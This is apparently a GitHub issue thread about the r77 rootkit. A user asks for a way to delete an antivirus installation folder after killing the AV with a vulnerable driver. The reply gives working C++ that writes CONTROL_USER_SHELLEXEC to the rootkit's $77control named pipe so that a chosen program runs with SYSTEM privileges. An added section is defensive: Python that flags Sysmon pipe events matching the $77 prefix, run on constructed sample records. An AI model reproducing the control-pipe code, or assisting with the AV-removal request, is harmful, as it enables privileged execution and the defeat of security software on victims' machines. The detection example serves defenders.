Closed KRAFMA closed 9 months ago
There's no need to modify r77 itself to achieve that. Once r77 is installed & running, you can communicate with the rootkit service through a named pipe. When you send CONTROL_USER_SHELLEXEC, r77 executes a file with SYSTEM privileges for you - and that executable should delete those files, etc.
There are more control codes, see the documentation for an exhaustive list. Here is an example of how to use one particular control code.
Look at the example in ControlPipe.cpp:

```cpp
#include <Windows.h>

// This example demonstrates how to make r77 perform a ShellExecute.
// All other control codes work similarly.

#define CONTROL_USER_SHELLEXEC 0x3001 // These constants can be found in r77def.h or in the technical documentation

int main()
{
    // Connect to the r77 service. The rootkit must be installed.
    HANDLE pipe = CreateFileW(L"\\\\.\\pipe\\$77control", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
    if (pipe != INVALID_HANDLE_VALUE)
    {
        DWORD controlCode = CONTROL_USER_SHELLEXEC;
        WCHAR shellExecPath[] = L"C:\\Windows\\System32\\notepad.exe";
        WCHAR shellExecCommandline[] = L"mytextfile.txt";

        // Write control code (DWORD)
        DWORD bytesWritten;
        WriteFile(pipe, &controlCode, sizeof(DWORD), &bytesWritten, NULL);

        // Write the path for ShellExec (unicode string including null terminator)
        WriteFile(pipe, shellExecPath, (lstrlenW(shellExecPath) + 1) * sizeof(WCHAR), &bytesWritten, NULL);

        // Write arguments for ShellExec (unicode string including null terminator)
        WriteFile(pipe, shellExecCommandline, (lstrlenW(shellExecCommandline) + 1) * sizeof(WCHAR), &bytesWritten, NULL);

        // Now, a new process "notepad.exe mytextfile.txt" will spawn.
        // You will only see it in TaskMgr. Because this process is running under the SYSTEM user, it does not show up on the desktop.
        // Use the Test Console to try out different control codes.

        CloseHandle(pipe);
    }

    return 0;
}
```
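From a defender's side, the control pipe named above (`\\.\pipe\$77control`) is the observable artifact of this mechanism: any process that creates or connects to a pipe with that name is talking to the rootkit service. The following is an added detection example, not code from the r77 project or from this thread. It scans pipe-creation and pipe-connection records for names starting with the `$77` prefix. The sample records are constructed and use a simplified subset of Sysmon's PipeEvent fields (Event ID 17 = pipe created, 18 = pipe connected); the treatment of the whole `$77` prefix as suspicious, rather than only `$77control`, is an assumption of this example.

```python
"""Flag named-pipe telemetry that references r77's "$77" control pipe.

Added example, not part of the r77 project or of the original issue thread.
The pipe name \\.\pipe\$77control comes from the thread above; treating every
pipe whose name starts with "$77" as suspicious is an assumption made here.
"""
import re
from typing import Dict, Iterable, List

R77_PIPE_PREFIX = "$77"

# Sysmon named-pipe event IDs (real values): 17 = PipeCreated, 18 = PipeConnected.
PIPE_EVENT_IDS = {17: "PipeCreated", 18: "PipeConnected"}

# Constructed sample records (not real telemetry). Sysmon logs the pipe name
# with a leading backslash, e.g. "\$77control"; a full path form is also handled.
SAMPLE_EVENTS = [
    {"EventID": 17, "PipeName": "\\$77control",
     "Image": "C:\\Windows\\System32\\svchost.exe", "ProcessId": 1234},
    {"EventID": 18, "PipeName": "\\$77control",
     "Image": "C:\\Users\\alice\\tool.exe", "ProcessId": 5678},
    {"EventID": 17, "PipeName": "\\lsass",
     "Image": "C:\\Windows\\System32\\lsass.exe", "ProcessId": 700},
    # A process-creation event (ID 1) has no PipeName and must be skipped.
    {"EventID": 1, "Image": "C:\\Windows\\System32\\notepad.exe", "ProcessId": 4242},
]


def normalize_pipe_name(name: str) -> str:
    """Reduce "\\.\pipe\name" or "\name" to the bare pipe name."""
    name = re.sub(r"^\\\\\.\\pipe\\", "", name, flags=re.IGNORECASE)
    return name.lstrip("\\")


def is_r77_pipe(name: str) -> bool:
    """True when the pipe name carries the r77 "$77" prefix."""
    return normalize_pipe_name(name).startswith(R77_PIPE_PREFIX)


def find_r77_pipe_events(events: Iterable[Dict]) -> List[Dict]:
    """Return a summary for every pipe event whose pipe name matches."""
    hits = []
    for ev in events:
        kind = PIPE_EVENT_IDS.get(ev.get("EventID"))
        if kind is None:
            continue  # not a pipe event
        if is_r77_pipe(ev.get("PipeName", "")):
            hits.append({
                "kind": kind,
                "pipe": ev["PipeName"],
                "image": ev.get("Image"),
                "pid": ev.get("ProcessId"),
            })
    return hits


if __name__ == "__main__":
    for hit in find_r77_pipe_events(SAMPLE_EVENTS):
        print(f"{hit['kind']}: pid {hit['pid']} ({hit['image']}) -> {hit['pipe']}")
```

The PipeConnected hit is the more interesting one for triage: the creator of the pipe is the rootkit service, while the connecting process is whatever client is issuing control codes, which is what you would want to isolate and examine.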
Closed due to inactivity.
Hello man,
You think it is possible to do a simple PoC or add on your r77 any code to force the deletion of a file/folder (example, I can kill some AV with a vuln driver) but the best would be to delete the installation folder after killing